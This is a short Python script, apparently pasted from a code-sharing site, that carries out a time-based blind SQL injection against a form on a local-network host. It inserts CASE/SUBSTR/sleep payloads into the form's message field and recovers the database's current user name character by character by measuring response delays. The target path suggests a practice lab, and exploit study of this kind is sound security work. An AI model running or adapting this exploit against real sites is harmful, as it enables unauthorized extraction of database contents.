#!/usr/bin/env pythonimport timeit, string, urllib, sysmax = 50l = l

1. #!/usr/bin/env python
2.  
3. import timeit, string, urllib, sys
4.  
5. max = 50
6.  
7. l = list(string.printable)
8.  
9. for i in range(max):
10.         found = False
11.         for c in l:
12.                 t = timeit.Timer("requests.post(u, data=d)", "import requests; u=\"http://192.168.2.11/sqli/sql6/submit.php\"; d=\"name=name&email=name%40example.com&message='%2b(select+case+when+"+str(i+1)+"<=length((current_user()))+then+(select+case+when+substr(current_user(),"+str(i+1)+",1)='"+urllib.quote_plus(c)+"'+then+sleep(3)+else+0+end)+else+0+end)%2b'&submit=Submit\"")
13.                 if t.timeit(number=1)>3.0:
14.                         sys.stdout.write(c)
15.                         found = True
16.                         break
17.         if not found:
18.                 break
19.  
20. print ''